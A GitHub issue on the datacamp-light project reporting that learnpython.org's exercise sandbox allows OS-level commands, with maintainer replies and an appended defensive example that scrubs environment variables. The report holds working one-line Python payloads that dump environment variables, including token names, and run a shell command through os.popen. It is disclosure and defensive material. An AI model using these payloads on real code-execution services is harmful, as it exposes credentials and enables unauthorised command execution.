datacamp / datacamp-light

Convert any blog or website to an interactive learning platform for data science
GNU Affero General Public License v3.0

Security Concerns #55

Closed bakera81 closed 6 years ago

bakera81 commented 6 years ago

On learnpython.org, you can execute OS level commands.

Steps to Reproduce

  1. Head over to https://www.learnpython.org/en/Hello%2C_World%21

    Example to get OS environment data (the string passed to compile() uses `\n` escapes so that it is a single valid Python literal):

    eval(compile('for x in range(1):\n import os\n print(os.environ)','a','single'))

    Returns:

    environ({'PYTHONPATH': '/usr/local/lib/python3.5/dist-packages:/var/lib/python/site-packages', 'LC_ALL': 'en_US.UTF-8', 'HOSTNAME': '****', 'SHARED_PYTHON_PATH': '/var/lib/python/site-packages', 'LANGUAGE': 'en_US:en', 'HOME': '/home/repl', 'GITHUB_TOKEN': '****', 'PATH': '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin', 'PROXYTOKEN': '****', 'SHARED_R_PATH': '/var/lib/R/shared_libs', 'PYTHONWARNINGS': 'ignore', 'PYTHON_BACKEND_DEBUG': 'False', 'LANG': 'en_US.UTF-8', 'BOKEH_SERVER_URL': 'https://bokeh-server.datacamp.com/', 'TERM': 'xterm'})

    Example to get OS code execution (simple example using the 'id' command):

    eval(compile("""__import__('os').popen(r'id').read()""",'','single')) 

    Returns:

    Out[1]: 'uid=1000(repl) gid=1000(repl) groups=1000(repl)

More info: https://sethsec.blogspot.com/2016/11/exploiting-python-code-injection-in-web.html

machow commented 6 years ago

You don't need to use eval. These commands can be run directly on any datacamp light python exercises. However, it is being run as root (which hopefully protects against most issues):


filipsch commented 6 years ago

@bakera81 not sure if this is a security issue. Our code execution service allows people to run arbitrary python code, so code for OS-level commands. However, this code is executed as a non-root user, so your ability to mess things up is rather limited. I'm closing this, as this is something we're aware of, but if you have a targeted example where this is troublesome, please reopen!
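The environment dump in the original report lists deployment variables such as GITHUB_TOKEN and PROXYTOKEN next to harmless ones like PATH and HOME; running learner code as a non-root user limits what it can change on the host but does not hide those values from os.environ. The example below is added here and is not code from the datacamp-light project or from any commenter: it runs learner code in a child interpreter with an allow-listed environment and probes which names remain visible. The allow-list and the placeholder token values are assumptions.

```python
import subprocess
import sys

# Variables learner code legitimately needs; everything else is dropped.
# This list is an assumption for illustration, not the project's configuration.
ENV_ALLOWLIST = ("PATH", "HOME", "LANG", "LC_ALL", "PYTHONPATH", "TERM")


def scrubbed_env(parent_env):
    """Return a copy of parent_env containing only allow-listed variables."""
    return {k: v for k, v in parent_env.items() if k in ENV_ALLOWLIST}


def run_learner_code(code, parent_env, scrub=True):
    """Execute `code` in a fresh interpreter and return (returncode, stdout).

    With scrub=True the child only receives the allow-listed variables;
    with scrub=False it inherits parent_env unchanged (the leaky baseline).
    """
    env = scrubbed_env(parent_env) if scrub else dict(parent_env)
    proc = subprocess.run(
        [sys.executable, "-c", code],
        env=env,
        capture_output=True,
        text=True,
        timeout=10,
    )
    return proc.returncode, proc.stdout


def leaked_names(parent_env, probe_names, scrub=True):
    """Run a probe that reports which of probe_names learner code can read."""
    probe = (
        "import os\n"
        "print(' '.join(n for n in %r if n in os.environ))" % (list(probe_names),)
    )
    _, out = run_learner_code(probe, parent_env, scrub=scrub)
    return out.split()


if __name__ == "__main__":
    # Constructed parent environment modelled on the issue's dump; values are placeholders.
    parent = {"PATH": "/usr/bin:/bin", "HOME": "/home/repl",
              "GITHUB_TOKEN": "placeholder", "PROXYTOKEN": "placeholder"}
    names = ["GITHUB_TOKEN", "PROXYTOKEN", "PATH"]
    print("inherited env, visible:", leaked_names(parent, names, scrub=False))
    print("scrubbed env, visible: ", leaked_names(parent, names, scrub=True))
```

Scrubbing the environment is only one layer; secrets that reach the sandbox through files or network-reachable services still need their own controls.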